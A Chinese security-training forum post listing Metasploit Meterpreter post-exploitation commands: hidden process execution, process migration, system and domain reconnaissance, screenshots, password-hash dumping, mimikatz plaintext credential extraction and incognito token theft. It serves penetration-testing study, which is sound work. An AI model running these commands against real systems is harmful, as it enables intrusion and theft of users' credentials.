请选择 进入手机版 | 继续访问电脑版

女黑客安全网-零基础入门网络安全学习-渗透测试零基础入门学习

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 389|回复: 0

MSF后渗透利用整理|MSF命令大全一(原创: tools 洛米唯熊 4...)

[复制链接]

127

主题

142

帖子

1134

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
1134
发表于 2019-7-17 01:49:30 | 显示全部楼层 |阅读模式
后渗透脚本知识
权限维持、权限提升、内网渗透等
内网渗透:信息搜集、读取用户hash、浏览器密码
域渗透:获取域控的控制权
Meterpreter基本概念
Meterpreter是Metasploit框架中的一个扩展模块,在攻击成 功以后给我们返回一个控制通道,是metsploit后渗透必不可少的 ,它具有强大的功能,包括socks代理,端口转发,键盘监听等多 个功能,meterpreter可以说是内网渗透测试神器。
基本功能
(1)系统信息获取
(2)密码哈希导出
(3)文件上传下载
(4)屏幕截取
(5)键盘记录
(6)权限提升
(7)跳板攻击
(8)反追踪
优点: 纯内存工作模式,执行漏洞渗透攻击的时候会直接装载meterpreter的 动态链接库到目标进程的空间中,使得meterpreter启动隐蔽,很难被杀毒软 件检测到;
一、后渗透基本操作
1.基本命令
background # 让meterpreter处于后台模式
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
irb # 开启ruby终端
2.文件操作命令
cat # 查看文件内容
getwd # 查看当前工作目录
upload # 上传文件到目标机上
download # 下载文件到本机上
640?wx_fmt=png.jpg
edit # 编辑文件
search # 搜索文件
3.网络命令
ipconfig / ifconfig # 查看网络接口信息
Portfwd # 端口转发 本机监听端口 把目标机端口转到本机端口上
Rdesktop # 使用rdesktop来连接 -u 用户名 -p 密码
Route # 获取路由表信息
二、后渗透基本操作
1.系统命令
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
640?wx_fmt=png.jpg
shutdown # 关机
三、后渗透高级操作
1.Post模块
run post/windows/gather/enum_applications #获取安装软件信息
640?wx_fmt=png.jpg
run post/windows/gather/dumplinks #获取最近的文件操作
run scraper #获取常见信息 #保存在~/.msf4/logs/scripts/scraper/目录下
640?wx_fmt=png.jpg
run post/windows/gather/enum_patches #补丁信息
640?wx_fmt=png.jpg
run post/windows/gather/enum_domain #查找域控
2.Load命令
load #加载模块
meterpreter > load mimikatz #加载mimikatz
meterpreter > load incognito #加载incoginto 盗窃目标主机的令牌或是假冒用户
3.信息搜集
用户是否在线
①查看是否为虚拟机
run post/windows/gather/checkvm
640?wx_fmt=png.jpg
② quser :查看用户是否在线
640?wx_fmt=png.jpg
③idletime :检查受害者闲置多久
640?wx_fmt=png.jpg
④screenshot :截屏
640?wx_fmt=png.jpg
640?wx_fmt=png.jpg
4.用户口令
①hash
我们需要将administrator权限提升至system权限才能获取成功
640?wx_fmt=png.jpg
meterpreter > run post/windows/gather/smart_hashdump
将域的密码也打出来
640?wx_fmt=png.jpg
②mimikatz
meterpreter > load mimikatz #加载mimikatz
meterpreter > msv #获取hash值
meterpreter > Kerberos #获取明文
meterpreter > ssp #获取明文信息
meterpreter > wdigest #获取系统账户信息
meterpreter > mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示
meterpreter > mimikatz_command -f hash:: #获取目标 hash
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords

必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网-零基础入门网络安全学习-渗透测试零基础入门学习 ( 津ICP备17008032号-3 )版权所有:一极(天津)安全技术服务有限公司

GMT+8, 2019-8-19 09:15 , Processed in 0.038892 second(s), 23 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表